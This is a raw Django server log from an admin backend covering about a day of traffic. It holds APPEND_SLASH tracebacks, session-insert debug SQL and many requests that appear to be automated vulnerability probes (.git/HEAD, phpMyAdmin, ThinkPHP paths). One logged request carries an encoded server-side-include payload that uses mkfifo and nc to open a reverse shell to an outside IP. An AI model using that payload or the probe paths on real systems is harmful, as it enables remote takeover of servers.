/editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [22/Dec/2019 08:52:29] "POST /editBlackAndWhiteList HTTP/1.0" 500 63898 [22/Dec/2019 08:52:36] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:55:02] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 08:57:57] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:09:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 09:09:22,886 utils 4252 140031732287232 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y6lw3x122k7a6ncf1ve4q7n5cfbvy212' LIMIT 1; args=('y6lw3x122k7a6ncf1ve4q7n5cfbvy212',) DEBUG 2019-12-22 09:09:22,888 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y6lw3x122k7a6ncf1ve4q7n5cfbvy212', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T09:09:22.887191+00:00'::timestamptz); args=('y6lw3x122k7a6ncf1ve4q7n5cfbvy212', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 9, 9, 22, 887191, tzinfo=)) [22/Dec/2019 09:09:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:19:00] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:24:08] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:29:11] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:34:13] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:41:16] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:46:19] "GET / HTTP/1.0" 302 0 [22/Dec/2019 09:51:21] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:00:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:11:07] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:16:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:21:26] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:26:28] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:31:31] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:36:49] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:43:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:49:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 10:56:53] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [22/Dec/2019 11:02:36] "GET /proxy.php HTTP/1.0" 404 6454 [22/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:14:08] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:19:33] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:24:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:29:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:35:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:40:04] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:47:17] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 11:47:53] "GET /robots.txt HTTP/1.0" 404 6451 [22/Dec/2019 11:47:54] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:52:20] "GET / HTTP/1.0" 302 0 [22/Dec/2019 11:57:22] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:04:24] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:08:14] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:10:04] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:17:40] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:22:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:30:28] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:35:31] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:38:21] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:40:33] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:45:35] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [22/Dec/2019 12:50:58] "GET /manager/html HTTP/1.0" 404 6456 [22/Dec/2019 12:51:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 12:56:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:05:39] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:12:25] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:17:28] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:22:30] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:28:19] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:35:36] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:40:38] "GET / HTTP/1.0" 302 0 Not Found: /.git/HEAD [22/Dec/2019 13:46:42] "GET /.git/HEAD HTTP/1.0" 404 6447 [22/Dec/2019 13:47:55] "GET / HTTP/1.0" 302 0 Not Found: /.git/HEAD [22/Dec/2019 13:49:50] "GET /.git/HEAD HTTP/1.0" 404 6447 [22/Dec/2019 13:54:48] "GET / HTTP/1.0" 302 0 [22/Dec/2019 13:59:50] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:10:10] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:15:13] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:21:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:26:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:33:31] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:38:55] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:43:58] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:49:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 14:54:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 15:00:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 Not Found: /.git/HEAD [22/Dec/2019 15:09:21] "GET /.git/HEAD HTTP/1.0" 404 6447 Not Found: /robots.txt [22/Dec/2019 15:09:34] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [22/Dec/2019 15:09:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=190 HTTP/1.0" 404 6532 Not Found: /jyky/ShowArticle.asp [22/Dec/2019 15:09:37] "GET /jyky/ShowArticle.asp?ArticleID=357 HTTP/1.0" 404 6495 [22/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:15:09] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:22:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:28:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:33:37] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:38:54] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:40:41] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:43:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 15:50:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 15:57:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:04:58] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:10:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:15:44] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:25:40] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:30:43] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:35:46] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:40:49] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:46:32] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:51:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 16:56:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:03:29] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:05:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:11:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:16:44] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:21:47] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:31:37] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:40:30] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:45:58] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:51:12] "GET / HTTP/1.0" 302 0 [22/Dec/2019 17:56:15] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:11:46] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:19:27] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:24:30] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:29:54] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:35:22] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:40:24] "GET / HTTP/1.0" 302 0 Not Found: /mysql/admin/index.php [22/Dec/2019 18:41:57] "GET /mysql/admin/index.php?lang=en HTTP/1.0" 404 6491 Not Found: /mysql/dbadmin/index.php [22/Dec/2019 18:41:58] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.0" 404 6497 Not Found: /mysql/sqlmanager/index.php [22/Dec/2019 18:41:59] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.0" 404 6506 Not Found: /mysql/mysqlmanager/index.php [22/Dec/2019 18:41:59] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.0" 404 6512 Not Found: /phpmyadmin/index.php [22/Dec/2019 18:42:01] "GET /phpmyadmin/index.php?lang=en HTTP/1.0" 404 6488 Not Found: /phpMyadmin/index.php [22/Dec/2019 18:42:01] "GET /phpMyadmin/index.php?lang=en HTTP/1.0" 404 6488 [22/Dec/2019 18:45:27] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:50:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 18:50:30] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [22/Dec/2019 18:54:09] "GET /proxy.php HTTP/1.0" 404 6452 [22/Dec/2019 18:56:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:18:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:23:26] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:28:29] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:33:32] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:39:39] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:44:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:49:45] "GET / HTTP/1.0" 302 0 [22/Dec/2019 19:54:48] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:00:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:10:06] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:15:09] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:21:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:26:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:33:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 20:40:35] "GET /robots.txt HTTP/1.0" 404 6451 [22/Dec/2019 20:40:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 20:40:36,432 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2z4q0xry5zs3toa1gmpb95f0fduon5at' LIMIT 1; args=('2z4q0xry5zs3toa1gmpb95f0fduon5at',) DEBUG 2019-12-22 20:40:36,434 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2z4q0xry5zs3toa1gmpb95f0fduon5at', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T20:40:36.432868+00:00'::timestamptz); args=('2z4q0xry5zs3toa1gmpb95f0fduon5at', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 20, 40, 36, 432868, tzinfo=)) [22/Dec/2019 20:40:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 20:40:37] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [22/Dec/2019 20:40:38] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [22/Dec/2019 20:40:38] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [22/Dec/2019 20:40:39] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [22/Dec/2019 20:40:40] "GET /static/js/0.chunk.js HTTP/1.0" 404 1662 [22/Dec/2019 20:40:40] "GET /static/js/bundle.js HTTP/1.0" 404 1659 [22/Dec/2019 20:40:40] "GET /static/js/main.chunk.js HTTP/1.0" 404 1671 [22/Dec/2019 20:40:41] "GET /static/js/0.chunk.js HTTP/1.0" 404 1662 [22/Dec/2019 20:42:15] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:42:30] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:47:18] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:52:21] "GET / HTTP/1.0" 302 0 [22/Dec/2019 20:57:24] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:14:32] "GET / HTTP/1.0" 302 0 Not Found: /index.php [22/Dec/2019 21:18:32] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [22/Dec/2019 21:18:33] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 [22/Dec/2019 21:19:34] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:24:46] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:29:49] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:34:51] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:39:54] "GET / HTTP/1.0" 302 0 Not Found: /index.php [22/Dec/2019 21:43:05] "GET /index.php HTTP/1.0" 404 6451 [22/Dec/2019 21:47:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 21:56:20] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [22/Dec/2019 21:58:54] "POST /editBlackAndWhiteList HTTP/1.0" 500 63907 [22/Dec/2019 22:02:52] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:12:51] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:17:54] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:22:57] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:30:33] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:35:37] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:40:40] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:40:55] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:45:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:51:08] "GET / HTTP/1.0" 302 0 [22/Dec/2019 22:56:11] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 23:02:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:11:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:16:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 23:22:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:27:04] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 23:28:47] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [22/Dec/2019 23:28:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=191 HTTP/1.0" 404 6532 Not Found: /newslist.asp [22/Dec/2019 23:28:53] "GET /newslist.asp?type=4&id=1338 HTTP/1.0" 404 6476 [22/Dec/2019 23:33:17] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 23:38:20] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:43:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:48:26] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:54:37] "GET / HTTP/1.0" 302 0 [22/Dec/2019 23:59:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:05:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:10:28] "GET / HTTP/1.0" 302 0 Not Found: /license.php [23/Dec/2019 00:11:27] "GET /license.php HTTP/1.0" 404 6454 [23/Dec/2019 00:16:59] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:22:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:27:04] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [23/Dec/2019 00:31:21] "GET /proxy.php HTTP/1.0" 404 6454 [23/Dec/2019 00:33:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:39:31] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:47:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 00:53:38] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [23/Dec/2019 00:59:54] "POST /editBlackAndWhiteList HTTP/1.0" 500 63913 [23/Dec/2019 01:00:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:10:33] "GET / HTTP/1.0" 302 0 Not Found: /incl/image_test.shtml [23/Dec/2019 01:11:30] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2094.102.49.104%2031112%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 6638 [23/Dec/2019 01:15:36] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:21:27] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:26:30] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:31:33] "GET / HTTP/1.0" 302 0 Not Found: /phpmyadmin//index.php [23/Dec/2019 01:31:41] "GET /phpmyadmin//index.php HTTP/1.0" 404 6483 Not Found: //index.php [23/Dec/2019 01:31:42] "GET //index.php HTTP/1.0" 404 6450 [23/Dec/2019 01:37:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:42:53] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:43:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:47:56] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:52:58] "GET / HTTP/1.0" 302 0 [23/Dec/2019 01:58:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:10:46] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:15:49] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:21:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:24:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:26:04] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:31:48] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:36:55] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:42:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:48:17] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:53:20] "GET / HTTP/1.0" 302 0 [23/Dec/2019 02:58:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:04:33] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:10:04] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:15:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:20:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:25:11] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:32:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:37:44] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 03:42:22] "GET /robots.txt HTTP/1.0" 404 6451 [23/Dec/2019 03:42:25] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:42:46] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:49:59] "GET / HTTP/1.0" 302 0 [23/Dec/2019 03:55:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:05:50] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:10:32] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:11:44] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:13:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:16:00] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:21:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:26:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:31:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:40:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:45:12] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:50:14] "GET / HTTP/1.0" 302 0 [23/Dec/2019 04:58:10] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:16:31] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [23/Dec/2019 05:20:20] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [23/Dec/2019 05:20:22] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [23/Dec/2019 05:20:23] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [23/Dec/2019 05:20:25] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [23/Dec/2019 05:20:27] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [23/Dec/2019 05:20:27] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [23/Dec/2019 05:20:29] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [23/Dec/2019 05:20:31] "GET /index.php HTTP/1.0" 404 6447 [23/Dec/2019 05:20:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 05:20:33,049 utils 4252 140031732287232 (0.013) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hgnahtpf2cguigyjx406hsg7gjh5x2fi' LIMIT 1; args=('hgnahtpf2cguigyjx406hsg7gjh5x2fi',) DEBUG 2019-12-23 05:20:33,053 utils 4252 140031732287232 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hgnahtpf2cguigyjx406hsg7gjh5x2fi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T05:20:33.049887+00:00'::timestamptz); args=('hgnahtpf2cguigyjx406hsg7gjh5x2fi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 5, 20, 33, 49887, tzinfo=)) [23/Dec/2019 05:20:33] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 05:22:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:27:27] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:32:29] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:37:32] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:44:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:49:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:54:07] "GET / HTTP/1.0" 302 0 [23/Dec/2019 05:59:22] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:05:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:19:15] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:26:18] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:31:21] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:33:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:36:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:41:26] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:46:52] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:51:55] "GET / HTTP/1.0" 302 0 [23/Dec/2019 06:57:23] "GET / HTTP/1.0" 302 0 [23/Dec/2019 07:00:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /TP/public/index.php [23/Dec/2019 07:00:11] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [23/Dec/2019 07:00:11] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [23/Dec/2019 07:00:12] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [23/Dec/2019 07:00:13] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [23/Dec/2019 07:00:13] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [23/Dec/2019 07:00:14] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [23/Dec/2019 07:00:15] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [23/Dec/2019 07:00:16] "GET /index.php HTTP/1.0" 404 6447 [23/Dec/2019 07:00:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 07:00:20,772 utils 4252 140031732287232 (0.002) 